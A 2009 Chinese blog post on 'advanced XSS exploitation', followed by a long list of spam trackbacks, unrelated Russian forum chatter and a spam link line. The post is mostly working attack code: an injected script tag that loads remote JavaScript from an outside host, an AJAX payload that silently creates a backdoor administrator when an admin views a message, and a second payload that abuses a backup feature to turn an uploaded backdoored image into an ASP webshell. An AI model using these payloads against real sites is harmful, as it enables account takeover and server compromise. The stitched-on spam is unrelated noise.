xss的高级利用
This entry was posted on Oct 14 2009
作者:cnryan
来源:http://hi.baidu.com/cnryan
以往对XSS的利用大多数都是针对于挂马,钓鱼,盗cookie等,这些方式并没有真正发挥到XSS的作用,因为很少人能了解XSS的实质,会话劫持,浏览器劫持,XSS能做到的东西远远超乎我们的想象。
一 XSS下提升权限
随着AJAX技术在许多大型SNS网站的应用,XSS也变得愈加流行,在XSS场景下运用AJAX能更有效地发挥它的作用。
用户输入的地方最容易滋生XSS,譬如留言、评论等表单,我搭建了一个sdbook的留言本,因为sdbook没有对用户输入的变量作出合适的过滤,导致一个XSS的产生。
留言率先传递给管理员,当作javascript劫持,我们就可以利用管理员的权限做任何事情,例如添加一个管理员。
在留言内容输入跨站代码:
1 | <script>s=document.createElement("script");s.src="http://www.xss.com/xss.js";document.getElementsByTagName("head")[0].appendChild(s);</script> |
这段代码用来加载远程的JS,而xss.js的内容是利用xmlHttp对象发送一个异步请求,通过XMLHTTP无刷新提交到服务器端,模拟添加一个管理员。
先用Firebug监视网络传输的情况,主要是获取添加admin时post的数据。
然后构造ajax代码
xss.js代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } xmlhttp=request; add_admin(); function add_admin(){ var url="/sdbook/admin/AdminUser/adminUser_Add.asp"; var params ="UserName=cnryan&password1=123456&password2=123456Purview=%B9%DC%C0%ED%D4%B1&Submit=%CC%E1%BD%BB"; xmlhttp.open("POST", url, true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.setRequestHeader("Content-length", params.length); xmlhttp.setRequestHeader("Connection", "close"); xmlhttp.send(params); } |
当admin查看带有XSS的留言时,就会在后台悄悄地添加一个管理员,帐户为cnryan,密码是123456,最后我们就能获得整个网站用户的最高权限。
再来了解下这个留言本的场景,最初只有admin可以查看留言,也就只有admin受到XSS,当内容通过审核,发布到网站,此时所有的web浏览用户都有可能受到XSS,我们能获得更多的会话劫持,利用这些会话甚至可能对服务器发起XSS DOS。
二 XSS获取webshell
为什么要用AJAX,首先它够隐秘,也就是所谓的“无刷新”,其次,它能更有效地迅速处理各种复杂多变的数据。
了解到以上例子的流程与代码,你是否会有不一样的想法呢?
我们不防想一想如何把网站的webshell拿下。
这里有两点必要的条件,前者是在其后台要有一定拿shell的功能,如备份数据库,向配置信息插马等,后者是我们要知道如网站路径,默认数据库等信息,对于许多网站都是存在这些缺陷的。
以备份数据库拿webshell为例,这个站点有上传头像的权限,并记录我们的地址:UploadFace\20090901.jpg,图片写有后门,然后在白盒的测试环境下记录POST的数据,构造AJAX代码写入远程的JS,最后在该站的XSS点植入JS。
其代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | var request = false; if(window.XMLHttpRequest) { request = new XMLHttpRequest(); if(request.overrideMimeType) { request.overrideMimeType('text/xml'); } } else if(window.ActiveXObject) { var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP']; for(var i=0; i<versions.length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } xmlhttp=request; getshell(); function getshell(){ var postStr ="DBpath=UploadFace%5C20090901.jpg&bkfolder=Databackup&bkDBname=shell.asp"; xmlhttp.open("POST", "/ADMIN_data.asp?action=BackupData&act=Backup", true); xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xmlhttp.setRequestHeader("Content-length", postStr.length); xmlhttp.setRequestHeader("Connection", "close"); xmlhttp.send(postStr); } |
上述代码是我测试一个开源程序写的,不同的程序不尽相同,但大体相似。
getshell()函数的作用就是把UploadFace\20090901.jpg备份为Databackup目录下的shell.asp。
一切利用的前提就是该站具有XSS,并能成功把构造代码注入到后台,只要管理员不经意触发了这个xss Trap,我们就能拿到webshell。
三 基于开源的Xss Hacking
以上事例都是在针对于白盒环境下测试的,很多问题都是基于理论的,在真实环境下利用XSS渗透是会有一定的难度,但仍是有办法的,XSS的核心在于灵活多变,这也是它倍受追捧的原因,关于XSS渗透可以去看jianxin的文章。
XSS热潮已至,相信各位渗透师,跨站师们势必会把XSS的威力发挥到极致。
相关资料:
http://www.80sec.com/xss-how-to-root.html
http://www.80sec.com/browser-hijacking.html
http://hi.baidu.com/aullik5/blog/item/6947261e7eaeaac0a7866913.html
167 Responses
to “xss的高级利用”
164 Trackback(s)
- Nov 6, 2011: door repair Van Cortlandt Village NY
- Nov 8, 2011: baby diapers
- Nov 9, 2011: site security services
- Nov 10, 2011: cheap plantation shutters
- Nov 10, 2011: cheap appliances store
- Nov 10, 2011: LCD tv
- Nov 10, 2011: treadmills
- Nov 10, 2011: Accident news blog
- Nov 10, 2011: Golf For Beginners
- Nov 11, 2011: drink guy
- Nov 16, 2011: Homer Somsy
- Nov 17, 2011: dove soap coupons
- Nov 17, 2011: Christal Europe
- Nov 19, 2011: australian government grants
- Nov 19, 2011: online public relations
- Nov 21, 2011: nintendo wii
- Nov 21, 2011: articles abortion
- Nov 21, 2011: love film promotional code
- Nov 22, 2011: Brice Bulgrin
- Nov 22, 2011: psychic sally
- Nov 22, 2011: Anti Aging
- Nov 22, 2011: Informative
- Nov 22, 2011: office equipment
- Nov 22, 2011: set up mobile email
- Nov 22, 2011: london photocopiers
- Nov 23, 2011: discount office equipment
- Nov 23, 2011: natural swimming pools
- Nov 24, 2011: montregps.org
- Nov 24, 2011: vélo enfant
- Nov 24, 2011: hoodia diet
- Nov 24, 2011: tin ceiling panels
- Nov 25, 2011: office equipment
- Nov 25, 2011: unlocked t-mobile cell phones
- Nov 25, 2011: office photocopier
- Nov 25, 2011: cardiofrequencemetre
- Nov 25, 2011: finding a notary
- Nov 25, 2011: white ceramic watch
- Nov 25, 2011: cliquez ici
- Nov 25, 2011: white ceramic watches
- Nov 25, 2011: rsms visa consultants in adelaide
- Nov 26, 2011: cliquez ici
- Nov 26, 2011: four micro onde
- Nov 26, 2011: Highscore Games
- Nov 27, 2011: facebook like exchange
- Nov 27, 2011: 1932 s washington quarter
- Nov 29, 2011: Self Help
- Nov 29, 2011: Legal Aid Services San Jose
- Nov 29, 2011: car accident lawyer bellevue
- Nov 29, 2011: Motivational Speaking And Internet Marketing
- Nov 29, 2011: DUI Lawyer Nashville
- Nov 29, 2011: discount ricoh aficio
- Nov 29, 2011: heating spares
- Nov 30, 2011: naples florida real estate
- Nov 30, 2011: buy pepper spray
- Nov 30, 2011: automatic watch
- Nov 30, 2011: michael kors ceramic watch
- Nov 30, 2011: invicta skeleton watch
- Nov 30, 2011: A TV Repair Guy
- Dec 1, 2011: montre hello kitty
- Dec 1, 2011: report
- Dec 1, 2011: cliquez ici
- Dec 1, 2011: John
- Dec 1, 2011: paul
- Dec 2, 2011: promotional ties
- Dec 2, 2011: plumber maidstone
- Dec 2, 2011: appropriate Jewelry
- Dec 3, 2011: http://www.skeletonwatchmart.com/skeleton-watches/
- Dec 3, 2011: photocopiers kent
- Dec 4, 2011: Top Audio Interface
- Dec 4, 2011: tente de camping
- Dec 5, 2011: http://www.autoradiogps.fr/
- Dec 5, 2011: ici
- Dec 5, 2011: bottes pas cher
- Dec 6, 2011: site
- Dec 6, 2011: white watch
- Dec 6, 2011: friteuse sans huile seb
- Dec 7, 2011: http://colombianossinfronteras.org/index.php/2011/11/check-out-the-new-iron-man-3/
- Dec 7, 2011: reflex numerique
- Dec 7, 2011: echelle telescopique
- Dec 7, 2011: liquid hoodia
- Dec 8, 2011: More Information
- Dec 8, 2011: robot menager
- Dec 8, 2011: Bob
- Dec 8, 2011: lit parapluie leclerc
- Dec 8, 2011: plancha gaz pas cher
- Dec 9, 2011: Degenerative Joint Disease
- Dec 9, 2011: tireuse à bière
- Dec 9, 2011: montres femmes
- Dec 10, 2011: sac à main pas cher
- Dec 10, 2011: automatic watches
- Dec 11, 2011: gps moto
- Dec 11, 2011: robot multifonction
- Dec 11, 2011: trampoline avec filet pas cher
- Dec 12, 2011: designer jewelry
- Dec 13, 2011: piscine autoportante pas cher
- Dec 14, 2011: telephone fixe pas cher
- Dec 14, 2011: casque audio sans fil
- Dec 15, 2011: disque dur externe pas cher
- Dec 15, 2011: cliquez ici
- Dec 15, 2011: telephone fixe sans fil
- Dec 15, 2011: imprimante laser couleur
- Dec 15, 2011: sacoche homme cuir
- Dec 17, 2011: tables basses design
- Dec 18, 2011: white watches for women
- Dec 19, 2011: decodeur tnt hd
- Dec 19, 2011: http://www.montres-homme.org/
- Dec 19, 2011: montre automatique
- Dec 20, 2011: aspirateur balai
- Dec 22, 2011: Carrier Parts
- Dec 25, 2011: aspirateur silencieux et puissant
- Dec 25, 2011: Buy Facebook Fans
- Dec 25, 2011: barbecue gaz
- Dec 26, 2011: balai vapeur
- Dec 26, 2011: Patrick
- Dec 26, 2011: cuiseurvapeur.org
- Dec 27, 2011: barriere de securite
- Dec 28, 2011: barbecue weber electrique
- Dec 30, 2011: ceramic watches
- Dec 30, 2011: friteuse sans huile
- Jan 5, 2012: Waterside Plaza NY emergency locksmith
- Jan 7, 2012: Iron Man 3
- Jan 7, 2012: Warlock Guide
- Jan 7, 2012: trampoline avec filet pas cher
- Jan 7, 2012: my url
- Jan 7, 2012: Iron Man 3
- Jan 9, 2012: siege auto bebe
- Jan 9, 2012: Lucie
- Jan 9, 2012: montre gps garmin
- Jan 10, 2012: cafetiere expresso delonghi
- Jan 10, 2012: friteuse electrique sans huile
- Jan 11, 2012: trampoline pas cher
- Jan 13, 2012: planchaelectrique.net
- Jan 13, 2012: coffee
- Jan 14, 2012: wet basements in Iron City OH
- Jan 15, 2012: Good Reasons to Give Personalize Jewelry
- Jan 19, 2012: Iron Man 3
- Jan 21, 2012: mediterranean diet weight loss
- Jan 29, 2012: TUV Rheinland Safety
- Jan 31, 2012: Finding the Best Deal on Jewelry Watches
- Feb 2, 2012: rasoir electrique
- Feb 2, 2012: Sell My Gold Jewelry Ontario
- Feb 2, 2012: wartrol does it work
- Feb 2, 2012: standing liberty quarter dollar
- Feb 2, 2012: adult social networking
- Feb 2, 2012: mediterranean diet pyramid
- Feb 2, 2012: wartrol price
- Feb 3, 2012: iPhone 5 Release Date
- Feb 3, 2012: Great Clips Omaha Coupons
- Feb 3, 2012: Great Clips Coupons Wyoming
- Feb 3, 2012: Kamasz
- Feb 3, 2012: Inexpensive LED Light Bulbs
- Feb 3, 2012: Garmin 1490t GPS
- Feb 3, 2012: iPhone 5
- Feb 3, 2012: Great Clips Coupons Alpine
- Feb 3, 2012: Great Clips Coupons Alabama
- Feb 3, 2012: Barátokat Keresek
- Feb 4, 2012: Great Clips Coupons Denver
- Feb 4, 2012: Lower Back Extensions
- Feb 4, 2012: dog bedding
- Feb 4, 2012: church chairs
- Feb 4, 2012: lose weight fast
- Feb 4, 2012: fxo
- Feb 4, 2012: közösségi portálok
- Feb 5, 2012: SEO Company
You must be logged in to post a comment.
Меня товарищи зовут отмечать новогодние праздники за границей. При чём не просто за границей, а на море, в Египте! По идее всё для этого есть, и финансовая возможность и действующий загранпаспорт. Пишу это не с целью похвастаться. Хочется посоветоваться с теми, у кого есть опыт встречи Нового года в тёплых краях. Как это вообще? Я, по правде говоря очень себе плохо представляю новый год без снега и маленькой ёлочки, ледяных горок и детского смеха, Медведева по ТВ за 5 мин до курантов, бутылки водки и немеренного количества мандаринов. А что взамен этого может мне дать Египет? По правде говоря, не был там ни разу, и желание полежать на горячем египетском песочке имеется. Но не думал делать это именно в Новый Год.
Что посоветуете? Как мне быть???
Спешу поделиться новостью: обмен Яндекс.Денег на Вебмани и обратно больше официально не производится. Не знаю, какая их собака укусила, но сейчас обмен практически невозможен. Все крупные обменники, коими я пользовался переводы в данных направлениях просто не осуществляют. Порой приходилось с ЯД на WM переводить немалые суммы. И что теперь делать, ума не приложу.
Хорошо наверное тем, кто не пользуется электронной валютой, а по старинке - банковскими операциями, платёжками по факсу и тд)))
GGwerK qoaklqxhsdsr, [url=http://wejyehsuhjld.com/]wejyehsuhjld[/url], [link=http://mwtvqshadsek.com/]mwtvqshadsek[/link], http://cczaibivgvlv.com/